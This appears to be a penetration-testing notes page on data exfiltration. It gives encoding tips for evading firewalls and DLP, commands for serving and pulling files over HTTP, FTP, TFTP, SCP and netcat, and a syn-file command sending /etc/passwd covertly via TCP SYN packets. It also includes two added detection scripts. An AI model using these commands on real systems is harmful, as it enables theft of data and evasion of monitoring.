Data Exfiltration
Hack Responsibly.
Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Not much here yet...please feel free to contribute at my GitHub page.
The first step to exfiltration is to avoid being caught. This means avoiding firewalls, data loss prevention, email filters, and more. Encoding/encrypting your payload is a good way to do this.
Preparing files for transport
Base64 encode a file
base64 -w0 "$file"
Base64 decode a file
base64 -d "$file"
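From the defender's side, the point above about encoding getting past content filters can be shown in a few lines. This is an added example, not code from the original page: a content rule for passwd-style records misses a base64-wrapped upload unless the filter decodes candidate runs first. The rule, the threshold of 24 characters, the function names and the sample requests are all assumptions constructed for illustration.

```python
import base64
import re

# Content rule a DLP filter might apply: an /etc/passwd-style record.
PASSWD_RULE = re.compile(rb"^[a-z_][a-z0-9_-]*:[^:\n]*:\d+:\d+:", re.M)
# Candidate base64 runs: 24+ alphabet characters (padding is ignored).
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{24,}")


def decoded_views(payload):
    """Yield (offset, decoded bytes) for every plausible base64 run."""
    for m in B64_RUN.finditer(payload):
        # A run can start mid-token (e.g. after a "/" in a URL path), so
        # try all four alignments; whole 4-char groups always decode.
        for shift in range(4):
            chunk = m.group()[shift:]
            chunk = chunk[: len(chunk) // 4 * 4]
            if chunk:
                yield m.start() + shift, base64.b64decode(chunk)


def dlp_scan(payload, decode=True):
    """Return [(view, offset)] for each place the content rule matches."""
    hits = [("raw", 0)] if PASSWD_RULE.search(payload) else []
    if decode:
        hits += [("base64", off) for off, data in decoded_views(payload)
                 if PASSWD_RULE.search(data)]
    return hits


# Constructed sample traffic (not captured from a real system).
RECORDS = (b"root:x:0:0:root:/root:/bin/bash\n"
           b"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")
HEADERS = b"POST /sync HTTP/1.1\r\nHost: files.example.test\r\n\r\n"
PLAIN_POST = HEADERS + RECORDS
ENCODED_POST = HEADERS + b"blob=" + base64.b64encode(RECORDS)

if __name__ == "__main__":
    print(dlp_scan(PLAIN_POST))                  # raw rule fires
    print(dlp_scan(ENCODED_POST, decode=False))  # keyword-only filter: no hit
    print(dlp_scan(ENCODED_POST))                # decode-then-inspect fires
```

Decoding only helps against encodings; encrypted payloads show nothing to a content rule, so they have to be caught by volume, destination or entropy instead.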
HTTP/HTTPS
HTTP is one of the easier ways to transfer a file, as most devices have web access. Start by finding a directory on the target that you can write to.
# find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
# wget http://<url> -O url.txt -o /dev/null
Curl has the benefit of being able to transfer with IMAP, POP3, SCP, SFTP, SMB, SMTP, TELNET, TFTP, and other protocols. Experimentation may be needed to figure out what is blocked/allowed by the firewall.
# curl -o file.txt http://url.com
Scripted HTTP Servers
python2 -m SimpleHTTPServer $port
python3 -m http.server $port
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:8888
# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.pem with the following command:
#    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows (Python 2 only; BaseHTTPServer and SimpleHTTPServer do not exist in Python 3):
#    python simple-https-server.py
# then in your browser, visit:
# https://localhost:443
import BaseHTTPServer, SimpleHTTPServer
import ssl
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
FTP
Python FTP server
#!/usr/bin/env python3
# Author : Paranoid Ninja
# Modified: Zweilos
# Description : Creates a Simple FTP Server in the specified directory
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
import argparse

def main():
    parser = argparse.ArgumentParser(description="Simple FTP Server for file sharing.")
    parser.add_argument("--port", type=int, default=2121, help="Port to run the FTP server on (default: 2121)")
    parser.add_argument("--user", type=str, default="ninja", help="Username for FTP login (default: ninja)")
    parser.add_argument("--password", type=str, default="ninja", help="Password for FTP login (default: ninja)")
    parser.add_argument("--directory", type=str, default=".", help="Directory to serve files from (default: current directory)")
    args = parser.parse_args()

    authorizer = DummyAuthorizer()
    authorizer.add_user(args.user, args.password, args.directory, perm='elradfmw')

    handler = FTPHandler
    handler.authorizer = authorizer
    handler.banner = "Ninja FTP Server"

    address = ('', args.port)
    server = FTPServer(address, handler)
    server.max_cons = 256
    server.max_cons_per_ip = 5

    print(f"Starting FTP server on port {args.port}, serving files from {args.directory}")
    server.serve_forever()

if __name__ == '__main__':
    main()
You can also use the pyftpdlib module to quickly and easily set up an FTP server.
#pip3 install pyftpdlib
#python3 -m pyftpdlib -p 21
TFTP
Install the TFTP client
sudo apt update && sudo apt install atftp
Download with TFTP
# In Kali
atftpd --daemon --port 69 /tftp
# In reverse shell
tftp -i 10.10.10.10 GET nc.exe
Upload with TFTP
sudo mkdir /tftp
sudo chown nobody: /tftp
sudo atftpd --daemon --port 69 /tftp
tftp -i 10.11.0.4 put exfil.zip
SCP
SCP transfers files through SSH. See the SCP section for more.
Get file
# scp user@<remoteip>:/tmp/file /tmp/file
Put file
# scp /tmp/file user@<remoteIP>:/tmp/file
NetCat from target
#start listener to receive file
nc -nvlp 55555 > file
#send file to listening system
nc $target_ip 55555 < file
Python HTTP server script
#!/usr/bin/env python3
import argparse
from http.server import HTTPServer, SimpleHTTPRequestHandler
import os
import signal
import sys

def list_files(directory, port):
    GN = '\033[92m'    # Green
    CYAN = '\033[96m'  # Cyan
    RES = '\033[0m'    # Reset
    print(f"{GN}Files available for download:{RES}")
    for file in os.listdir(directory):
        if os.path.isfile(os.path.join(directory, file)):
            print(f"{CYAN}wget http://localhost:{port}/{file} -O {file}{RES}")

def handle_interrupt(signal, frame):
    print("\nServer has been shut down gracefully.")
    sys.exit(0)

def main():
    parser = argparse.ArgumentParser(description="Simple HTTP Server for file sharing.")
    parser.add_argument("-p", "--port", type=int, default=8099, help="Port to run the HTTP server on (default: 8099)")
    parser.add_argument("-d", "--directory", type=str, default=os.getcwd(), help="Directory to serve files from (default: current working directory)")
    parser.add_argument("-l", "--links", action="store_true", help="Show wget links for files being served")
    args = parser.parse_args()

    signal.signal(signal.SIGINT, handle_interrupt)
    print(f"\nStarting HTTP server on port {args.port}, serving files from {args.directory}\n")
    os.chdir(args.directory)
    server_address = ('', args.port)
    httpd = HTTPServer(server_address, SimpleHTTPRequestHandler)
    if args.links:
        list_files(args.directory, args.port)
    httpd.serve_forever()

if __name__ == "__main__":
    main()
Other Programs
Data exfiltration using TCP SYN
The syn-file tool can exfiltrate data by carrying it in the sequence numbers of TCP SYN packets.
./syn-file -i eth0 -d 192.168.1.158 -f /etc/passwd -p 8080 -P 8081 -m 00:0C:0A:4a:3b:5ch
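For detection, a channel like this leaves two traces in packet metadata. The following is an added example, not part of the original page or of the syn-file project: it flags a source that sends many SYNs without ever completing a handshake and whose initial sequence numbers read as text. That the tool places four raw file bytes in each 32-bit sequence number is an assumption (the page does not describe the encoding), and the record layout, thresholds, addresses and sample content are constructed.

```python
from collections import defaultdict

SYN, ACK = 0x02, 0x10  # TCP flag bits


def isn_is_text(seq):
    """True when all four bytes of a 32-bit sequence number are text."""
    return all(b in (9, 10, 13) or 32 <= b < 127 for b in seq.to_bytes(4, "big"))


def flag_syn_channels(packets, min_syns=8, min_ratio=0.9):
    """packets: iterable of (src, dst, dport, tcp_flags, seq).
    Returns {(src, dst, dport): first bytes carried in the ISNs}."""
    syns, completed = defaultdict(list), set()
    for src, dst, dport, flags, seq in packets:
        if flags & SYN and not flags & ACK:
            syns[(src, dst, dport)].append(seq)
        elif flags == ACK:              # bare ACK: client finished a handshake
            completed.add((src, dst, dport))
    flagged = {}
    for key, seqs in syns.items():
        ratio = sum(map(isn_is_text, seqs)) / len(seqs)
        # Signal 1: many SYNs that never become connections.
        # Signal 2 (assumed encoding): ISNs that read as text, not random.
        if len(seqs) >= min_syns and key not in completed and ratio >= min_ratio:
            flagged[key] = b"".join(s.to_bytes(4, "big") for s in seqs)[:32]
    return flagged


# Constructed packet records (documentation address ranges, made-up content).
TEXT = b"constructed sample line one\nconstructed sample line two\n"
COVERT_KEY = ("198.51.100.7", "192.0.2.10", 8081)
COVERT = [(*COVERT_KEY, SYN, int.from_bytes(TEXT[i:i + 4], "big"))
          for i in range(0, len(TEXT), 4)]
BENIGN = []
for n in range(1, 9):                   # eight ordinary connections
    isn = (0x9E3779B1 * n) & 0xFFFFFFFF
    BENIGN += [("198.51.100.20", "192.0.2.10", 443, SYN, isn),
               ("198.51.100.20", "192.0.2.10", 443, ACK, (isn + 1) & 0xFFFFFFFF)]

if __name__ == "__main__":
    print(flag_syn_channels(BENIGN + COVERT))
```

The first signal does not depend on the encoding; the text-ratio check only applies when the carried file is plain text and would miss compressed or encrypted content.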
Resources
DNSFTP - Get file with DNS requests